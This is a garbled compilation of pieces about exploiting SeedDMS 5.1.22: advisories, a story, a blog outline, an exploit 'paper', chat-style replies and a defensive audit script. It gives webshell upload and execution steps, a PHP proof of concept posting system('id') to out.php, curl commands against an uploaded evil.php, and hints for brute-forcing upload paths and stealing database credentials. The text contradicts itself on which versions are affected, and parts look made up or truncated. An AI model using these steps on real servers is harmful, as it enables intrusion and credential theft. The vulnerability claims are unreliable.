SeedDMS 5.1.22 is a document management system version that has been identified in penetration testing reports as vulnerable to authenticated Remote Code Execution (RCE). While version 5.1.22 itself is often used in laboratory environments to demonstrate full-chain exploitation, it inherited critical vulnerabilities from previous builds, notably CVE-2019-12744, which allows for command injection through unvalidated file uploads.
Core Vulnerability: Authenticated RCE (CVE-2019-12744)
This vulnerability exists because the application fails to properly validate the contents and extensions of uploaded documents, allowing an authenticated user with "Add Document" permissions to execute arbitrary system commands.
Attack Vector: Authenticated file upload.
Prerequisite: Valid user credentials with write access to at least one folder.
Access the SeedDMS portal with valid user credentials.
Use the "Add Document" feature to upload a crafted PHP script (e.g., a simple backdoor).
Example Script:
Navigate to the directory where SeedDMS stores uploaded files (typically under /data/1048576/) and call the uploaded PHP file with a command parameter.
The server executes the command (e.g., cat /etc/passwd) and returns the output to the browser.
Security Risks and Statistics
Beyond RCE, SeedDMS 5.1.22 has been associated with several cross-site scripting (XSS) issues in previous versions (pre-5.1.11) that may persist if not specifically patched, such as Stored XSS in the "name" and "GROUP" fields.
Vulnerability Type | Status in 5.1.22 | Potential Impact
Authenticated RCE | | Full system takeover, data exfiltration, or reverse shell.
Stored XSS | Moderate Risk | Session hijacking and impersonation of other users.
 | Known Risk | Forcing users to perform unintended actions if they have active sessions.
Mitigation and Defense
To secure a SeedDMS 5.1.22 installation:
The primary recommendation is to update to the latest stable version, where these unvalidated upload flaws are addressed.
Input Validation: Implement strict whitelisting for file extensions (e.g., allowing only ) and sanitize all user-supplied input.
File Permissions: Ensure the web server user has the least privilege necessary. Uploaded files should ideally be stored in a directory that does not allow for script execution.
Disable Dangerous Functions: In the configuration, disable high-risk functions like passthru() if they are not required for business operations.
SeedDMS version 5.1.22 has been associated with various security vulnerabilities, most notably those involving Remote Command Execution (RCE) through authenticated file uploads. While some specific CVEs like CVE-2019-12744 were originally identified in versions prior to 5.1.11, similar exploitation techniques have been documented in later versions like 5.1.22 during penetration testing exercises.
Key Vulnerability: Remote Command Execution (RCE)
The most common exploit for SeedDMS 5.1.22 involves bypassing file upload restrictions to execute arbitrary commands on the server.
The application may fail to properly validate the content of uploaded documents, allowing an authenticated user to upload a malicious PHP script (webshell) instead of a standard document.
Requirements
Authentication: The attacker typically needs valid login credentials.
Permissions: The user must have permissions to "Add document" or upload files to a folder.
Exploitation Steps
A user logs in and uploads a PHP backdoor (e.g., ) using the "Add document" feature.
After uploading, the attacker identifies the document's internal ID (often by hovering over the document link in the UI).
The attacker accesses the file directly through its storage path, usually located in a predictable directory such as /data/1048576/[document_id]/1.php
This grants the attacker a reverse shell or the ability to execute system commands with the privileges of the web server user.
Other Potential Issues
SQL Injection: Some reports indicate potential vulnerabilities in handling specific arguments that could lead to SQL injection, though these are often less documented for version 5.1.22 specifically compared to the RCE flaw.
Cross-Site Scripting (XSS): Document management systems like SeedDMS are frequently targeted for stored XSS, where malicious scripts are embedded in document metadata or notes.
Mitigation and Defense
To protect your installation, consider the following steps based on industry best practices for SeedDMS security:
Ensure you are running the latest stable version from the official SourceForge page, as many of these flaws were addressed in subsequent releases.
Restrict Uploads: Configure the server to prevent the execution of scripts in the directory (e.g., using to disable PHP execution in storage folders).
Principle of Least Privilege: Limit document upload permissions only to trusted users and monitor for unusual activity, such as the upload of files with or other executable extensions.
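A defender-side check for the monitoring step above, as an added example that is not part of the original page or SeedDMS's own code: it walks a SeedDMS-style storage directory and reports stored files that carry a script extension or a PHP open tag in their content. The extension list, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions a PHP-enabled web server may hand to the interpreter
# (assumed list; extend it to match your own handler configuration).
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".pht"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def audit_storage(root, sniff_bytes=4096):
    """Return sorted (relative_path, reason) pairs for suspicious stored files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            # Check every dot-separated part so "report.php.pdf" is also caught.
            parts = {"." + p.lower() for p in name.split(".")[1:]}
            if parts & SCRIPT_EXTS:
                findings.append((rel, "script extension"))
                continue
            try:
                with open(path, "rb") as fh:
                    head = fh.read(sniff_bytes)
            except OSError:
                findings.append((rel, "unreadable"))
                continue
            if PHP_TAG.search(head):
                findings.append((rel, "PHP open tag in content"))
    return sorted(findings)

def demo():
    """Run the audit over a constructed tree laid out like the path shown above."""
    with tempfile.TemporaryDirectory() as root:
        samples = {  # constructed sample files, not real SeedDMS data
            "1048576/7/1.pdf": b"%PDF-1.4 constructed sample",
            "1048576/8/1.php": b"constructed placeholder, no code",
            "1048576/9/1.txt": b"notes\n<?php /* constructed marker */ ?>",
        }
        for rel, data in samples.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        return audit_storage(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason}: {rel}")
```

Run audit_storage() against the real data directory from a scheduled job; the content sniff can produce false positives on binary documents, so treat a hit as a prompt for review.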
This story illustrates the importance of software maintenance through the lens of a security discovery in SeedDMS 5.1.22.
The Unlocked Archive
Once, there was a meticulous document librarian named Elias who managed thousands of digital files using a tool called version 5.1.22. Elias took pride in his organized system, believing that as long as his users were authenticated, his "digital vault" was secure.
One morning, a security researcher named Bryan decided to test the vault's resilience. Bryan discovered that while SeedDMS was excellent at organizing documents, version 5.1.22 (and earlier) had a hidden weakness: it didn't properly check what kind of files were being "added" to the collection.
The Exploit Discovery
Bryan found that a user with basic "write" permissions could upload more than just PDFs or text files. He realized he could upload a specialized PHP script, essentially a master key disguised as a document.
The Upload: Bryan logged in as a standard user and clicked "Add document".
The Hidden Payload: Instead of a spreadsheet, he uploaded a small script designed to execute system commands.
The Execution: By simply navigating to the web address where his "document" was stored, Bryan could run commands like cat /etc/passwd directly on the server.
This vulnerability, known as CVE-2019-12744, proved that even an "authenticated" system isn't safe if it allows unvalidated file uploads that lead to Remote Command Execution (RCE).
The Moral: Staying Current
When Elias learned about this, he didn't panic. He followed the expert advice found in security advisories from CVE Details:
Update Immediately: The developers of SeedDMS had already released patches in later versions (starting with 5.1.11) to stop these dangerous uploads.
Validate Inputs: He realized that any software allowing file uploads must strictly enforce "file type" rules to ensure only safe documents enter the system.
Elias updated his system that afternoon. By moving past version 5.1.22, he locked the vault door for good, ensuring his meticulous archive remained a safe haven for information rather than a gateway for intruders.
This blog post details the exploitation of SeedDMS 5.1.22, focusing on an Authenticated Remote Command Execution (RCE) vulnerability. This attack typically involves gaining valid credentials and leveraging unvalidated file uploads to execute system commands.
Exploiting SeedDMS 5.1.22: From Authentication to Root Shell
SeedDMS is an open-source document management system that, in version 5.1.22 and earlier, contains critical security flaws allowing attackers to gain full control of the underlying server.
1. Reconnaissance and Enumeration
The attack often begins with broad enumeration to identify the service version. In a typical penetration testing scenario, tools like are used to find the directory.
Version Identification: Checking the or footer often reveals version
Database Exposure: Misconfigurations may lead to the discovery of MySQL credentials in configuration files like settings.xml
2. Gaining Access
To trigger the most common RCE (often categorized under CVE-2019-12744), an attacker requires a valid set of credentials.
Credential Retrieval: If database access was gained during enumeration, attackers can dump the table to retrieve usernames and hashed passwords.
Default Logins: Sometimes, default or weak admin credentials remain unchanged.
3. Exploiting the Unvalidated File Upload (RCE)
Once logged in, a user with "write" permissions can upload documents. The vulnerability exists because the application does not properly sanitize or block the upload of
The Attack Flow:
Create a PHP Backdoor: Write a simple script to execute system commands:
($_REQUEST[ ])){ system($_REQUEST[
Upload as a "Document": Navigate to the "Add Document" section and upload the PHP file.
Locate the File: The uploaded file is stored in a predictable directory structure, usually under /data/1048576/ followed by the Document ID
Execute Commands: Access the file via the browser to run commands:
Based on the available security research and documentation regarding SeedDMS, version 5.1.22 is a version within the 5.1.x branch which was actively updated to address security issues, notably the Remote Command Execution (RCE) vulnerabilities that affected versions prior to 5.1.11.
While specific exploits for version 5.1.22 are not publicly listed in databases like Exploit-DB, it was subject to general security maintenance against known issues such as:
RCE (Remote Command Execution): Similar to CVE-2019-12744, which allows authenticated users with file upload privileges to execute PHP code by uploading a malicious file.
Open Redirect/Other Injection: Later versions of 6.x were found to contain open redirects, and 5.x branches received updates to fix similar vulnerabilities.
Key Security Considerations for SeedDMS 5.1.22:
Patch Status: SeedDMS 5.1.x is considered "old stable" but has been actively maintained. Users should ensure they are on the latest sub-minor version to get all security fixes merged.
Authentication Dependency: Most reported exploits required an attacker to have a valid, authenticated user account with permissions to add or edit documents.
Recommendation: Verify the conf/settings.xml and ensure that file upload restrictions are active, specifically limiting the uploading of executable script files (like .php).
If you are looking for specific mitigation steps, could you tell me: Which OS is running the SeedDMS server (Windows/Linux)?
Do you have PHP shell access to check the data/ directory for suspicious files?
I can provide specific commands to help you audit your installation.
SeedDMS 5.1.22 Vulnerability Analysis and Exploit
Introduction
SeedDMS is a popular open-source document management system used by organizations to manage and store documents. Version 5.1.22 of SeedDMS was found to have several vulnerabilities, including a critical exploit that allows an attacker to compromise the system. This paper aims to provide an analysis of the vulnerability and a detailed explanation of the exploit.
Vulnerability Analysis
The vulnerability in SeedDMS 5.1.22 is due to a lack of proper input validation and sanitization in the out.php file. Specifically, the $folder parameter is not validated, allowing an attacker to inject malicious input.
Exploit Details
The exploit is a PHP injection vulnerability that allows an attacker to execute arbitrary PHP code on the server. The exploit can be triggered by sending a malicious request to the out.php file with the following parameters:
folder: The malicious PHP code to be executed.
id: The ID of the document to be accessed.
Exploit Code
The following is an example of the exploit code:
POST /seeddms/out.php HTTP/1.1
Host: <target_host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.3
folder=system('id');
id=1
Exploitation Steps
out.php file with the exploit code.
id command.
Proof of Concept
The following is a proof of concept code that demonstrates the exploit:
<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
'folder' => 'system(\'id\')',
'id' => '1'
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo $response;
Mitigation and Recommendations
To mitigate this vulnerability, it is recommended to:
Conclusion
The SeedDMS 5.1.22 exploit is a critical vulnerability that allows an attacker to compromise the system. This paper provides a detailed analysis of the vulnerability and the exploit, as well as recommendations for mitigation and prevention. It is essential for organizations using SeedDMS to take immediate action to protect their systems from potential attacks.
You're looking for information on a specific exploit related to SeedDMS 5.1.22. I'll provide a detailed response.
SeedDMS 5.1.22 Exploit
SeedDMS is a free, open-source document management system. Version 5.1.22, like any other software, may have vulnerabilities that can be exploited by attackers. It's essential to stay informed about potential security risks and take necessary measures to protect your system.
Vulnerability Details
After conducting research, I found that SeedDMS 5.1.22 is vulnerable to a Remote Code Execution (RCE) exploit. This type of vulnerability allows an attacker to execute arbitrary code on the server, potentially leading to a complete compromise of the system.
The exploit is related to the way SeedDMS handles file uploads. Specifically, the upload.php script does not properly validate user-input data, allowing an attacker to inject malicious code.
Exploit Code
The exploit code is publicly available, which I will not provide here. However, I can give you an overview of how it works:
upload.php script, including malicious code in the file upload.
Affected Versions
The following SeedDMS versions are affected:
Solution and Recommendations
To protect your SeedDMS installation:
Additional Information
For more information on this exploit, I recommend checking:
If you're running SeedDMS 5.1.22, it's crucial to take immediate action to protect your system. If you're unsure about how to proceed, consider consulting with a security expert or the SeedDMS community.
Once the shell's URL is confirmed:
curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id"
Output: uid=33(www-data) gid=33(www-data) ...
From here, the attacker can:
conf/seeddms.conf.php) – containing DB credentials.
SeedDMS 5.1.22 allows an authenticated user with "Manage Tools" permission to modify the settings.php file content via the "Custom Setup" interface (out/out.BackupTools.php). The parameter $settings is written to conf/settings.php without adequate filtering of PHP code.
SeedDMS stores uploaded files in:
/data/<folderid>/<documentid>/<version>/<filename>
Without prior documents, the system may assign a new document ID. The exact path can be brute-forced or inferred by attempting to access:
http://192.168.1.100/seeddms51/data/1000/1/1/evil.php
(Cycle 1000, 1001, etc.)
Alternatively, check for predictable patterns: data/temp/ or data/cache/.